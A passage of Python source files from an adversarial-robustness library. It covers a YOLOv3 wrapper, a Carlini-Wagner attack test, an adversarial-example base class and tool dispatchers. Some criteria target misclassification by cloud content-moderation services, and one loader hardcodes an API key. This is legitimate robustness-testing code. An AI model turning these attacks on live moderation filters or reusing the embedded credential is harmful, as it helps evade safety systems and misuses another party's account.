self._tgt_cls_pred_and_grad_fn = K.function(
[model_input, target_class],
[boxes, scores, classes, tgt_cls_loss, tgt_cls_gradient]
)
def get_class(self):
classes_path = os.path.expanduser(self._classes_path)
with open(classes_path) as f:
class_names = f.readlines()
class_names = [c.strip() for c in class_names]
return class_names
def _get_anchors(self):
anchors_path = os.path.expanduser(self._anchors_path)
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def num_classes(self):
"""Return the number of classes."""
return self._num_classes
def class_names(self):
"""Return the class names as list."""
return self._class_names
def model_task(self):
"""Return the task of the model: classification of detection."""
return self._task
def batch_predictions(self, images):
"""Batch prediction of images.
Parameters
----------
images : `numpy.ndarray`
            The input images in [b, h, w, c] ndarray format.
Returns
-------
list
            List of batch prediction results.
            Each element is a dictionary containing:
            {'boxes', 'scores', 'classes'}
"""
px, _ = self._process_input(images)
_boxes, _box_scores, _box_confidence_logits, \
_box_class_probs_logits, _box_coord_logits = \
self._batch_gather_feats_fn([px])
boxes, scores, classes = self._batch_pred_fn(
[_boxes, _box_scores])
predictions = []
for i in range(len(boxes)):
num = (scores[i] > 0.).sum()
pred = {}
pred['boxes'] = boxes[i][:num].tolist()
pred['scores'] = scores[i][:num].tolist()
pred['classes'] = classes[i][:num].tolist()
predictions.append(pred)
assert len(predictions) == images.shape[0], "batch size doesn't match."
return predictions
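    # Shape of the returned value (illustrative numbers, not from the
    # original file): one dict per input image, e.g.
    #   [{'boxes': [[y_min, x_min, y_max, x_max], ...],
    #     'scores': [0.92, ...],
    #     'classes': [2, ...]}]
    # where class indices map into self._class_names and boxes are given in
    # pixel coordinates.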
def predictions_and_gradient(self, image, criterion):
""" Returns both predictions and gradients, and
potentially loss w.r.t. to certain criterion.
"""
input_shape = image.shape
px, dpdx = self._process_input(image)
if isinstance(criterion, TargetClassMiss) or \
isinstance(criterion, RegionalTargetClassMiss):
boxes, scores, classes, loss, gradient =\
self._tgt_cls_pred_and_grad_fn(
[px[np.newaxis], criterion.target_class()])
else:
raise NotImplementedError
prediction = {}
num = (scores[0] > 0.).sum()
prediction['boxes'] = boxes[0][:num].tolist()
prediction['scores'] = scores[0][:num].tolist()
prediction['classes'] = classes[0][:num].tolist()
gradient = self._process_gradient(dpdx, gradient)
assert gradient.shape == input_shape
return prediction, loss, gradient,
def backward(self, target_class, image):
"""Get gradient with respect to the image."""
px, dpdx = self._process_input(image)
loss, gradient = self._tgt_cls_bw_grad_fn([
target_class,
px[np.newaxis],
])
gradient = self._process_gradient(dpdx, gradient)
return loss, gradient
def _gather_feats(
self,
yolo_outputs,
anchors,
num_classes,
image_shape):
"""Evaluate model output to get _boxes and _boxes_scores logits.
"""
num_layers = len(yolo_outputs)
anchor_mask = [[6, 7, 8], [3, 4, 5], [0, 1, 2]] \
if num_layers == 3 else [[3, 4, 5], [1, 2, 3]] # default setting
input_shape = K.shape(yolo_outputs[0])[1:3] * 32
batch_size = K.shape(yolo_outputs[0])[0]
boxes = []
box_scores = []
box_coord_logits = []
box_confidence_logits = []
box_class_probs_logits = []
for l in range(num_layers):
_boxes, _box_scores, _box_coord_logits, \
_box_confidence_logits, _box_class_probs_logits =\
self._boxes_and_scores(
yolo_outputs[l], anchors[anchor_mask[l]],
num_classes, input_shape, image_shape, batch_size,
verbose=True)
boxes.append(_boxes)
box_scores.append(_box_scores)
box_coord_logits.append(_box_coord_logits)
box_confidence_logits.append(_box_confidence_logits)
box_class_probs_logits.append(_box_class_probs_logits)
boxes = K.concatenate(boxes, axis=1) # [batch_size, num_boxes, 4]
box_scores = K.concatenate(box_scores, axis=1)
box_coord_logits = K.concatenate(box_coord_logits, axis=1)
box_confidence_logits = K.concatenate(box_confidence_logits, axis=1)
box_class_probs_logits = K.concatenate(box_class_probs_logits, axis=1)
return boxes, box_scores, box_confidence_logits, \
box_class_probs_logits, box_coord_logits
def _target_class_loss(
self,
target_class,
box_scores,
box_class_probs_logits):
""" Evaluate target_class_loss w.r.t. the input.
"""
box_scores = K.squeeze(box_scores, axis=0)
box_class_probs_logits = K.squeeze(box_class_probs_logits, axis=0)
import tensorflow as tf
boi_idx = tf.where(box_scores[:, target_class] > self._score)
loss_box_class_conf = tf.reduce_mean(
tf.gather(box_class_probs_logits[:, target_class], boi_idx))
# Avoid the propagation of nan
return tf.cond(
tf.is_nan(loss_box_class_conf),
lambda: tf.constant(0.),
lambda: loss_box_class_conf)
def _eval_pred(
self,
boxes,
box_scores,
num_classes,
max_boxes=20,
score_threshold=.6,
iou_threshold=.5):
""" Evaluate logits for boxes and scores to final boxes, class, scores
results
"""
import tensorflow as tf
def process_batch(params):
boxes, box_scores = params
mask = box_scores >= score_threshold
max_boxes_tensor = K.constant(max_boxes, dtype='int32')
boxes_ = []
scores_ = []
classes_ = []
for c in range(num_classes):
# TODO: use keras backend instead of tf.
class_boxes = tf.boolean_mask(boxes, mask[:, c])
class_box_scores = tf.boolean_mask(
box_scores[:, c], mask[:, c])
nms_index = tf.image.non_max_suppression(
class_boxes, class_box_scores,
max_boxes_tensor, iou_threshold=iou_threshold)
class_boxes = K.gather(class_boxes, nms_index)
class_box_scores = K.gather(class_box_scores, nms_index)
classes = K.ones_like(class_box_scores, 'int32') * c
boxes_.append(class_boxes)
scores_.append(class_box_scores)
classes_.append(classes)
boxes_ = K.concatenate(boxes_, axis=0)
scores_ = K.concatenate(scores_, axis=0)
classes_ = K.concatenate(classes_, axis=0)
pad_len = max_boxes - tf.shape(boxes_)[0]
pad_boxes = tf.zeros([pad_len, 4], dtype=tf.float32)
pad_scores = tf.zeros(pad_len, dtype=tf.float32)
pad_classes = tf.zeros(pad_len, dtype=tf.int32)
boxes_ = tf.concat([boxes_, pad_boxes], axis=0)
scores_ = tf.concat([scores_, pad_scores], axis=0)
classes_ = tf.concat([classes_, pad_classes], axis=0)
return boxes_, scores_, classes_
boxes_, scores_, classes_ = tf.map_fn(
process_batch,
(boxes, box_scores),
dtype=(tf.float32, tf.float32, tf.int32))
return boxes_, scores_, classes_
def _boxes_and_scores(
self, feats, anchors, num_classes,
input_shape, image_shape, batch_size, verbose=False):
""" Convert Conv layer output to boxes.
Multiply box_confidence with class_confidence to get real
box_scores for each class.
Parameters
----------
feats : `Tensor`
Elements in the output list from `K.model.output`,
shape = (N, 13, 13, 255).
anchors : list
anchors.
num_classes : int
num of classes.
input_shape: tuple
input shape obtained from model output grid information.
image_shape: tuple
placeholder for ORIGINAL image data shape.
"""
if verbose is True:
box_xy, box_wh, box_confidence, box_class_probs, \
box_coord_logits, box_confidence_logits, \
box_class_probs_logits = self._model_head(
feats, anchors, num_classes, input_shape,
batch_size, verbose=verbose)
else:
box_xy, box_wh, box_confidence, box_class_probs = self._model_head(
feats, anchors, num_classes, input_shape, batch_size)
boxes = self._correct_boxes(
box_xy, box_wh, input_shape, image_shape)
boxes = K.reshape(boxes, [batch_size, -1, 4])
box_scores = box_confidence * box_class_probs
box_scores = K.reshape(box_scores, [batch_size, -1, num_classes])
if verbose is True:
box_coord_logits = K.reshape(
box_coord_logits, [batch_size, -1, 4])
box_confidence_logits = K.reshape(
box_confidence_logits, [batch_size, -1])
box_class_probs_logits = K.reshape(
box_class_probs_logits, [batch_size, -1, num_classes])
return boxes, box_scores, box_coord_logits,\
box_confidence_logits, box_class_probs_logits
return boxes, box_scores
def _model_head(
self, feats, anchors, num_classes,
input_shape, batch_size, calc_loss=False, verbose=False):
"""Convert final layer features to bounding box parameters.
No threshold or nms applied yet.
Args:
feats : `Tensor`
Elements in the output list from K.model.output:
shape = (N, 13, 13, 255)
anchors : list
anchors.
num_classes : int
num of classes.
input_shape : tuple
input shape obtained from model output grid information.
Returns:
Breaking the (num_class + 5) output logits into box_xy,
box_wh, box_confidence, and box_class_probs.
"""
num_anchors = len(anchors)
# Reshape to batch, height, width, num_anchors, box_params.
anchors_tensor = K.reshape(
K.constant(anchors), [1, 1, 1, num_anchors, 2])
grid_shape = K.shape(feats)[1:3] # height, width
grid_y = K.tile(
K.reshape(K.arange(0, stop=grid_shape[0]), [-1, 1, 1, 1]),
[1, grid_shape[1], 1, 1])
grid_x = K.tile(
K.reshape(K.arange(0, stop=grid_shape[1]), [1, -1, 1, 1]),
[grid_shape[0], 1, 1, 1])
grid = K.concatenate([grid_x, grid_y])
grid = K.cast(grid, K.dtype(feats))
feats = K.reshape(
feats, [-1, batch_size, grid_shape[0],
grid_shape[1], num_anchors, num_classes + 5])
        # Adjust predictions to each spatial grid point and anchor size.
box_xy = (K.sigmoid(feats[..., :2]) + grid) /\
K.cast(grid_shape[::-1], K.dtype(feats))
box_wh = K.exp(feats[..., 2:4]) * anchors_tensor /\
K.cast(input_shape[::-1], K.dtype(feats))
box_confidence = K.sigmoid(feats[..., 4:5])
box_class_probs = K.sigmoid(feats[..., 5:])
if calc_loss is True:
return grid, feats, box_xy, box_wh
if verbose is True:
# In verbose mode, return logits BEFORE sigmoid activation
box_coord_logits = feats[..., :4]
box_confidence_logits = feats[..., 4: 5]
box_class_probs_logits = feats[..., 5:]
return box_xy, box_wh, box_confidence, box_class_probs, \
box_coord_logits, box_confidence_logits, \
box_class_probs_logits
return box_xy, box_wh, box_confidence, box_class_probs
def _correct_boxes(
self, box_xy, box_wh, input_shape, image_shape):
"""Get corrected boxes, which are scaled to original shape."""
box_yx = box_xy[..., ::-1]
box_hw = box_wh[..., ::-1]
input_shape = K.cast(input_shape, K.dtype(box_yx))
image_shape = K.cast(image_shape, K.dtype(box_yx))
new_shape = K.round(image_shape * K.min(input_shape / image_shape))
offset = (input_shape - new_shape) / 2. / input_shape
scale = input_shape / new_shape
box_yx = (box_yx - offset) * scale
box_hw *= scale
box_mins = box_yx - (box_hw / 2.)
box_maxes = box_yx + (box_hw / 2.)
boxes = K.concatenate([
box_mins[..., 0:1], # y_min
box_mins[..., 1:2], # x_min
box_maxes[..., 0:1], # y_max
box_maxes[..., 1:2] # x_max
])
# Scale boxes back to original image shape.
boxes *= K.concatenate([image_shape, image_shape])
return boxes
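    # Worked example for the letterbox correction above (illustrative numbers,
    # not from the original file): with input_shape = (416, 416) and
    # image_shape = (480, 640), min(416/480, 416/640) = 0.65, so
    # new_shape = (312, 416), offset = (0.125, 0.0) and scale = (4/3, 1.0);
    # normalized y coordinates are shifted and stretched accordingly before
    # the final multiplication by image_shape converts boxes to pixels.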
```
#### File: perceptron/tests/test_attack_carlini_wagner.py
```python
from __future__ import absolute_import
# To be removed later
import sys
sys.path.append('/workspace/projects/baidu/aisec/perceptron')
from perceptron.utils.criteria.classification import Misclassification
from perceptron.utils.image import imagenet_example
from perceptron.utils.image import load_image
from perceptron.attacks import CarliniWagnerL2Attack as Attack
import numpy as np
def test_untargeted_vgg16(image, label=None):
import torch
import torchvision.models as models
from perceptron.models.classification import PyTorchModel
mean = np.array([0.485, 0.456, 0.406]).reshape((3, 1, 1))
std = np.array([0.229, 0.224, 0.225]).reshape((3, 1, 1))
vgg16 = models.vgg16(pretrained=True).eval()
if torch.cuda.is_available():
vgg16 = vgg16.cuda()
model = PyTorchModel(
vgg16, bounds=(0, 1), num_classes=1000, preprocessing=(mean, std))
print(np.argmax(model.predictions(image)))
attack = Attack(model, criterion=Misclassification())
print(image.shape)
adversarial = attack(image, label, unpack=True)
def test_untargeted_resnet18(image, label=None):
import torch
import torchvision.models as models
from perceptron.models.classification import PyTorchModel
mean = np.array([0.485, 0.456, 0.406]).reshape((3, 1, 1))
std = np.array([0.229, 0.224, 0.225]).reshape((3, 1, 1))
resnet18 = models.resnet18(pretrained=True).eval()
if torch.cuda.is_available():
resnet18 = resnet18.cuda()
model = PyTorchModel(
resnet18, bounds=(0, 1), num_classes=1000, preprocessing=(mean, std))
print(np.argmax(model.predictions(image)))
attack = Attack(model, criterion=Misclassification())
adversarial = attack(image, label, unpack=True)
if __name__ == "__main__":
image = load_image(
shape=(224, 224), data_format='channels_first', fname='car.png')
image = image / 255.
label = 644
test_untargeted_vgg16(image, label)
```
#### File: utils/adversarial/base.py
```python
import numpy as np
import numbers
from abc import ABC
from perceptron.utils.distances import MSE
from perceptron.utils.distances import Distance
class StopAttack(Exception):
"""Exception thrown to request early stopping of an attack
if a given (optional!) threshold is reached.
"""
pass
class Adversarial(ABC):
"""Defines the base class of an adversarial that should be found and
stores the result. The :class:`Adversarial` class represents a single
adversarial example for a given model, criterion and reference image.
It can be passed to an adversarial attack to find the actual adversarial.
Parameters
----------
model : a :class:`Model` instance
The model that should be evaluated against the adversarial.
criterion : a :class:`Criterion` instance
The criterion that determines which images are adversarial.
original_image : a :class:`numpy.ndarray`
The original image to which the adversarial image should
be as close as possible.
original_pred : int(ClsAdversarial) or dict(DetAdversarial)
The ground-truth predictions of the original image.
distance : a :class:`Distance` class
The measure used to quantify similarity between images.
threshold : float or :class:`Distance`
If not None, the attack will stop as soon as the adversarial
perturbation has a size smaller than this threshold. Can be
an instance of the :class:`Distance` class passed to the distance
argument, or a float assumed to have the same unit as the
the given distance. If None, the attack will simply minimize
the distance as good as possible. Note that the threshold only
influences early stopping of the attack; the returned adversarial
does not necessarily have smaller perturbation size than this
threshold; the `reached_threshold()` method can be used to check
if the threshold has been reached.
"""
def __init__(
self,
model,
criterion,
original_image,
original_pred=None,
threshold=None,
distance=MSE,
verbose=False):
self._model = model
self._criterion = criterion
self._original_image = original_image
self._original_image_for_distance = original_image
self._original_pred = original_pred
self._distance = distance
if threshold is not None and not isinstance(threshold, Distance):
threshold = distance(value=threshold)
self._threshold = threshold
self.verbose = verbose
self._best_adversarial = None
self._best_distance = distance(value=np.inf)
self._best_adversarial_output = None
self._total_prediction_calls = 0
self._total_gradient_calls = 0
self._best_prediction_calls = 0
self._best_gradient_calls = 0
# used for attacks that can provide a verifiable bound
self._verifiable_bounds = (0., 0.)
# check if the original image is already adversarial
try:
self.predictions(original_image)
except StopAttack:
# if a threshold is specified and the original input is
# misclassified, this can already cause a StopAttack
# exception
assert self._distance.value == 0.
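    # Illustrative construction (names below are placeholders, not from this
    # file):
    #   adv = Adversarial(model, criterion, image, original_pred=label,
    #                     threshold=1e-4, distance=MSE)
    # Every call to adv.predictions(candidate) updates the best adversarial
    # found so far; once a candidate is adversarial and its distance to the
    # original drops to or below the threshold, a StopAttack exception ends
    # the attack early (see reached_threshold()).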
def _reset(self):
self._best_adversarial = None
self._best_distance = self._distance(value=np.inf)
self._best_adversarial_output = None
self._best_prediction_calls = 0
self._best_gradient_calls = 0
self.predictions(self._original_image)
@property
def verifiable_bounds(self):
"""The verifiable bounds obtained so far."""
return self._verifiable_bounds
@verifiable_bounds.setter
def verifiable_bounds(self, bounds):
"""The setter of verifiable bounds"""
self._verifiable_bounds = bounds
@property
def image(self):
"""The best adversarial found so far."""
return self._best_adversarial
@property
def output(self):
"""The model predictions for the best adversarial found so far.
None if no adversarial has been found.
"""
return self._best_adversarial_output
@property
def distance(self):
"""The distance of the adversarial input to the original input."""
return self._best_distance
@property
def original_image(self):
"""The original input."""
return self._original_image
@property
def original_pred(self):
"""The original label."""
return self._original_pred
def set_distance_dtype(self, dtype):
"""Set the dtype of Distance."""
assert dtype >= self._original_image.dtype
self._original_image_for_distance = self._original_image.astype(
dtype, copy=False)
def reset_distance_dtype(self):
"""Reset the dtype of Distance."""
self._original_image_for_distance = self._original_image
def normalized_distance(self, image):
"""Calculates the distance of a given image to the
original image.
Parameters
----------
image : `numpy.ndarray`
The image that should be compared to the original image.
Returns
-------
:class:`Distance`
The distance between the given image and the original image.
"""
return self._distance(
self._original_image_for_distance,
image,
bounds=self.bounds())
def reached_threshold(self):
"""Returns True if a threshold is given and the currently
best adversarial distance is smaller than the threshold."""
return self._threshold is not None \
and self._best_distance <= self._threshold
def target_class(self):
"""Interface to criterion.target_class for attacks.
"""
try:
target_class = self._criterion.target_class()
except AttributeError:
target_class = None
return target_class
def num_classes(self):
"""Return number of classes."""
n = self._model.num_classes()
assert isinstance(n, numbers.Number)
return n
def bounds(self):
"""Return bounds of model."""
min_, max_ = self._model.bounds()
assert isinstance(min_, numbers.Number)
assert isinstance(max_, numbers.Number)
assert min_ < max_
return min_, max_
def in_bounds(self, input_):
"""Check if input is in bounds."""
min_, max_ = self.bounds()
return min_ <= input_.min() and input_.max() <= max_
def channel_axis(self, batch):
""" Interface to model.channel_axis for attacks.
Parameters
----------
batch : bool
Controls whether the index of the axis for a batch of images
(4 dimensions) or a single image (3 dimensions) should be
returned.
"""
axis = self._model.channel_axis()
if not batch:
axis = axis - 1
return axis
def has_gradient(self):
""" Returns true if _backward and _forward_backward can be called
by an attack, False otherwise.
"""
try:
self._model.gradient
self._model.predictions_and_gradient
except AttributeError:
return False
else:
return True
def _new_adversarial(self, image, predictions, in_bounds):
image = image.copy() # to prevent accidental inplace changes
distance = self.normalized_distance(image)
if in_bounds and self._best_distance > distance:
# new best adversarial
if self.verbose:
print('new best adversarial: {}'.format(distance))
self._best_adversarial = image
self._best_distance = distance
self._best_adversarial_output = predictions
self._best_prediction_calls = self._total_prediction_calls
self._best_gradient_calls = self._total_gradient_calls
if self.reached_threshold():
raise StopAttack
return True, distance
return False, distance
def _is_adversarial(self, image, predictions, in_bounds):
"""Interface to `criterion.is_adversary()` that calls
_new_adversarial if necessary.
Parameters
----------
image : `numpy.ndarray`
Image with shape (height, width, channels).
predictions : :class:`numpy.ndarray`
A vector with the predictions for some image.
        in_bounds : bool
            Whether the image lies within the model's input bounds.
"""
is_adversarial = self._criterion.is_adversarial(
predictions, self._original_pred)
assert isinstance(is_adversarial, bool) or \
isinstance(is_adversarial, np.bool_)
if is_adversarial:
is_best, distance = self._new_adversarial(
image, predictions, in_bounds)
else:
is_best = False
distance = None
return is_adversarial, is_best, distance
def predictions(self, image, strict=True, return_details=False):
"""Interface to model.predictions for attacks.
Parameters
----------
image : `numpy.ndarray`
Image with shape (height, width, channels).
strict : bool
Controls if the bounds for the pixel values should be checked.
"""
in_bounds = self.in_bounds(image)
assert not strict or in_bounds
self._total_prediction_calls += 1
predictions = self._model.predictions(image)
is_adversarial, is_best, distance = self._is_adversarial(
image, predictions, in_bounds)
if return_details:
return predictions, is_adversarial, is_best, distance
else:
return predictions, is_adversarial
def batch_predictions(
self, images, greedy=False, strict=True, return_details=False):
"""Interface to model.batch_predictions for attacks.
Parameters
----------
images : `numpy.ndarray`
Batch of images with shape (batch, height, width, channels).
greedy : bool
Whether the first adversarial should be returned.
strict : bool
Controls if the bounds for the pixel values should be checked.
"""
if strict:
in_bounds = self.in_bounds(images)
assert in_bounds
self._total_prediction_calls += len(images)
predictions = self._model.batch_predictions(images)
assert predictions.ndim == 2
assert predictions.shape[0] == images.shape[0]
if return_details:
assert greedy
adversarials = []
for i in range(len(predictions)):
if strict:
in_bounds_i = True
else:
in_bounds_i = self.in_bounds(images[i])
is_adversarial, is_best, distance = self._is_adversarial(
images[i], predictions[i], in_bounds_i)
if is_adversarial and greedy:
if return_details:
return predictions, is_adversarial, i, is_best, distance
else:
return predictions, is_adversarial, i
adversarials.append(is_adversarial)
if greedy: # pragma: no cover
# no adversarial found
if return_details:
return predictions, False, None, False, None
else:
return predictions, False, None
is_adversarial = np.array(adversarials)
assert is_adversarial.ndim == 1
assert is_adversarial.shape[0] == images.shape[0]
return predictions, is_adversarial
def gradient(self, image=None, label=None, strict=True):
"""Interface to model.gradient for attacks.
Parameters
----------
image : `numpy.ndarray`
Image with shape (height, width, channels).
Defaults to the original image.
label : int
Label used to calculate the loss that is differentiated.
Defaults to the original label.
strict : bool
Controls if the bounds for the pixel values should be checked.
"""
raise NotImplementedError
def predictions_and_gradient(
self, image=None, label=None, strict=True, return_details=False):
"""Interface to model.predictions_and_gradient for attacks.
Parameters
----------
image : `numpy.ndarray`
Image with shape (height, width, channels).
Defaults to the original image.
label : int
Label used to calculate the loss that is differentiated.
Defaults to the original label.
strict : bool
Controls if the bounds for the pixel values should be checked.
"""
raise NotImplementedError
def backward(self, gradient, image=None, strict=True):
raise NotImplementedError
```
#### File: perceptron/utils/tools.py
```python
from perceptron.utils.image import load_image
import matplotlib.pyplot as plt
class bcolors:
RED = "\033[1;31m"
BLUE = "\033[1;34m"
CYAN = "\033[1;36m"
GREEN = "\033[0;32m"
RESET = "\033[0;0m"
BOLD = "\033[;1m"
REVERSE = "\033[;7m"
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def get_image_format(framework_name, model_name):
"""Return the correct input range and shape for target framework and model"""
special_shape = {'pytorch':{'inception_v3': (299, 299)},
'keras': {'xception': (299, 299),
'inception_v3':(299, 299),
'yolo_v3': (416, 416),
'ssd300': (300, 300)}}
special_bound = {'keras':{'vgg16':(0, 255),
'vgg19':(0, 255),
'resnet50':(0, 255),
'ssd300': (0, 255)},
'cloud': {'aip_antiporn': (0, 255),
'google_safesearch': (0, 255),
'google_objectdetection': (0, 255)}}
default_shape = (224, 224)
default_bound = (0, 1)
if special_shape.get(framework_name, None):
if special_shape[framework_name].get(model_name, None):
default_shape = special_shape[framework_name][model_name]
if special_bound.get(framework_name, None):
if special_bound[framework_name].get(model_name, None):
default_bound = special_bound[framework_name][model_name]
return {'shape': default_shape, 'bounds': default_bound}
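# Examples of the lookups above (values follow directly from the tables):
#   get_image_format('keras', 'yolo_v3')    -> {'shape': (416, 416), 'bounds': (0, 1)}
#   get_image_format('keras', 'vgg16')      -> {'shape': (224, 224), 'bounds': (0, 255)}
#   get_image_format('pytorch', 'resnet18') -> {'shape': (224, 224), 'bounds': (0, 1)}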
def get_image(fname, framework_name, model_name, data_format):
"""Get the image suitable for target model."""
kwargs = get_image_format(framework_name, model_name)
kwargs['data_format'] = data_format
kwargs['fname'] = fname
image = load_image(**kwargs)
return image
def get_model(model_name, framework, summary):
"""Get model dispatcher."""
switcher = {
'keras': lambda: _load_keras_model(model_name, summary),
'tensorflow': lambda: _load_keras_model(model_name, summary),
'pytorch': lambda: _load_pytorch_model(model_name, summary),
'cloud': lambda: _load_cloud_model(model_name, summary)
}
_get_model = switcher.get(framework, None)
return _get_model()
def get_distance(distance_name):
"""Get the distance metric."""
import perceptron.utils.distances as distances
switcher = {
'mse': distances.MSE,
'mae': distances.MAE,
'linf': distances.Linf,
"l0": distances.L0,
"l2": distances.MSE
}
return switcher.get(distance_name, None)
def get_metric(attack_name, model, criteria, distance):
"""Get the attack class object."""
import perceptron.benchmarks as metrics
kwargs = {
'model': model,
'criterion': criteria,
'distance': distance,
}
switcher = {
"carlini_wagner_l2": lambda x: metrics.CarliniWagnerL2Metric(**x),
"carlini_wagner_linf": lambda x: metrics.CarliniWagnerLinfMetric(**x),
"additive_gaussian_noise": lambda x: metrics.AdditiveGaussianNoiseMetric(**x),
"additive_uniform_noise": lambda x: metrics.AdditiveUniformNoiseMetric(**x),
"blend_uniform_noise": lambda x: metrics.BlendedUniformNoiseMetric(**x),
"gaussian_blur": lambda x: metrics.GaussianBlurMetric(**x),
"brightness": lambda x: metrics.BrightnessMetric(**x),
"contrast_reduction": lambda x: metrics.ContrastReductionMetric(**x),
"motion_blur": lambda x: metrics.MotionBlurMetric(**x),
"rotation": lambda x: metrics.RotationMetric(**x),
"salt_and_pepper_noise": lambda x: metrics.SaltAndPepperNoiseMetric(**x),
"spatial": lambda x: metrics.SpatialMetric(**x),
"contrast": lambda x: metrics.ContrastReductionMetric(**x),
"horizontal_translation": lambda x: metrics.HorizontalTranslationMetric(**x),
"vertical_translation": lambda x: metrics.VerticalTranslationMetric(**x)
}
_init_attack = switcher.get(attack_name, None)
attack = _init_attack(kwargs)
return attack
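# Hypothetical end-to-end wiring of the dispatchers in this module (a sketch;
# the file name and `label` below are placeholders, not from the original
# file):
#   model = get_model('resnet18', 'pytorch', summary=False)
#   criteria = get_criteria('misclassification')
#   distance = get_distance('mse')
#   metric = get_metric('gaussian_blur', model, criteria, distance)
#   image = get_image('example.png', 'pytorch', 'resnet18', 'channels_first')
#   adversary = metric(image, annotation=label, unpack=False)
#   plot_image(adversary, figname='compare.png')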
def get_criteria(criteria_name, target_class=None):
"""Get the adversarial criteria."""
import perceptron.utils.criteria as criteria
switcher = {
"misclassification": lambda: criteria.Misclassification(),
"confident_misclassification": lambda: criteria.ConfidentMisclassification(),
"topk_misclassification": lambda: criteria.TopKMisclassification(10),
"target_class": lambda:criteria.TargetClass(target_class),
"original_class_probability": lambda:criteria.OriginalClassProbability(),
"target_class_probability": lambda:criteria.TargetClassProbability(target_class),
"target_class_miss_google": lambda:criteria.TargetClassMissGoogle(target_class),
"weighted_ap": lambda:criteria.WeightedAP(),
"misclassification_antiporn": lambda:criteria.MisclassificationAntiPorn(),
"misclassification_safesearch": lambda:criteria.MisclassificationSafeSearch(),
"target_class_miss": lambda:criteria.TargetClassMiss(target_class),
}
return switcher.get(criteria_name, None)()
def _load_keras_model(model_name, summary):
import keras.applications as models
switcher = {
'xception': lambda: models.xception.Xception(weights='imagenet'),
'vgg16': lambda: models.vgg16.VGG16(weights='imagenet'),
'vgg19': lambda: models.vgg19.VGG19(weights='imagenet'),
"resnet50": lambda: models.resnet50.ResNet50(weights='imagenet'),
"inception_v3": lambda: models.inception_v3.InceptionV3(weights='imagenet'),
"yolo_v3": lambda: _load_yolov3_model(),
"ssd300": lambda: _load_ssd300_model(),
"retina_resnet_50": lambda: _load_retinanet_resnet50_model()
}
_load_model = switcher.get(model_name, None)
_model = _load_model()
from perceptron.models.classification.keras import KerasModel as ClsKerasModel
from perceptron.models.detection.keras_ssd300 import KerasSSD300Model
from perceptron.models.detection.keras_yolov3 import KerasYOLOv3Model
from perceptron.models.detection.keras_retina_resnet50 import KerasResNet50RetinaNetModel
import numpy as np
format = get_image_format('keras', model_name)
if format['bounds'][1] == 1:
mean = np.array([0.485, 0.456, 0.406]).reshape((1, 1, 3))
std = np.array([0.229, 0.224, 0.225]).reshape((1, 1, 3))
preprocessing = (mean, std)
else:
preprocessing = (np.array([104, 116, 123]), 1)
switcher = {
'yolo_v3': lambda x: KerasYOLOv3Model(x, bounds=(0, 1)),
'ssd300': lambda x: KerasSSD300Model(x, bounds=(0, 255)),
'retina_resnet_50': lambda x: KerasResNet50RetinaNetModel(None, bounds=(0, 255)),
}
_wrap_model = switcher.get(
model_name,
lambda x: ClsKerasModel(x, bounds=format['bounds'], preprocessing=preprocessing))
kmodel = _wrap_model(_model)
return kmodel
def _load_cloud_model(model_name, summary):
import perceptron.models.classification.cloud as models
switcher = {
'aip_antiporn': lambda: _load_antiporn_model(),
"google_safesearch": lambda: models.GoogleSafeSearchModel(),
"google_objectdetection": lambda: models.GoogleObjectDetectionModel(),
}
_load_model = switcher.get(model_name, None)
cmodel = _load_model()
return cmodel
def _load_pytorch_model(model_name, summary):
import torchvision.models as models
switcher = {
'alexnet': lambda: models.alexnet(pretrained=True).eval(),
"vgg11": lambda: models.vgg11(pretrained=True).eval(),
"vgg11_bn": lambda: models.vgg11_bn(pretrained=True).eval(),
"vgg13": lambda: models.vgg13(pretrained=True).eval(),
"vgg13_bn": lambda: models.vgg13_bn(pretrained=True).eval(),
"vgg16": lambda: models.vgg16(pretrained=True).eval(),
"vgg16_bn": lambda: models.vgg16_bn(pretrained=True).eval(),
"vgg19": lambda: models.vgg19(pretrained=True).eval(),
"vgg19_bn": lambda: models.vgg19_bn(pretrained=True).eval(),
"resnet18": lambda: models.resnet18(pretrained=True).eval(),
"resnet34": lambda: models.resnet34(pretrained=True).eval(),
"resnet50": lambda: models.resnet50(pretrained=True).eval(),
"resnet101": lambda: models.resnet101(pretrained=True).eval(),
"resnet152": lambda: models.resnet152(pretrained=True).eval(),
"squeezenet1_0": lambda: models.squeezenet1_0(pretrained=True).eval(),
"squeezenet1_1": lambda: models.squeezenet1_1(pretrained=True).eval(),
"densenet121": lambda: models.densenet121(pretrained=True).eval(),
"densenet161": lambda: models.densenet161(pretrained=True).eval(),
"densenet201": lambda: models.densenet201(pretrained=True).eval(),
"inception_v3": lambda: models.inception_v3(pretrained=True).eval(),
}
_load_model = switcher.get(model_name, None)
_model = _load_model()
import torch
if torch.cuda.is_available():
_model = _model.cuda()
from perceptron.models.classification.pytorch import PyTorchModel as ClsPyTorchModel
import numpy as np
mean = np.array([0.485, 0.456, 0.406]).reshape((3, 1, 1))
std = np.array([0.229, 0.224, 0.225]).reshape((3, 1, 1))
pmodel = ClsPyTorchModel(
_model, bounds=(
0, 1), num_classes=1000, preprocessing=(
mean, std))
return pmodel
def _load_yolov3_model():
from perceptron.zoo.yolov3.model import YOLOv3
model = YOLOv3()
return model
def _load_ssd300_model():
from perceptron.zoo.ssd_300.keras_ssd300 import SSD300
model = SSD300()
return model
def _load_retinanet_resnet50_model():
from perceptron.models.detection.keras_retina_resnet50 import KerasResNet50RetinaNetModel
model = KerasResNet50RetinaNetModel()
return model
def _load_antiporn_model():
from perceptron.models.classification.cloud import AipAntiPornModel
appId = '15064794'
apiKey = '3R9pevnY2s077mCrzXP1Ole5'
secretKey = "<KEY>"
credential = (appId, apiKey, secretKey)
model = AipAntiPornModel(credential)
return model
# plot the images
def plot_image(adversary, title=None, figname='compare.png') :
prev = adversary.original_image
after = adversary.image
import numpy as np
if prev.shape[0] == 3 :
prev = np.transpose(prev, (1, 2, 0))
after = np.transpose(after, (1, 2, 0))
max_value = 255 if prev.max() > 1 else 1
diff = np.absolute(prev - after)
scale = max_value / diff.max()
diff = diff * scale
if max_value == 255:
prev = prev.astype('uint8')
after = after.astype('uint8')
diff = diff.astype('uint8')
fig, (ax1, ax2, ax3) = plt.subplots(1, 3)
plt.axis('off')
ax1.imshow(prev)
ax1.set_title('Origin')
ax1.axis('off')
ax2.imshow(after)
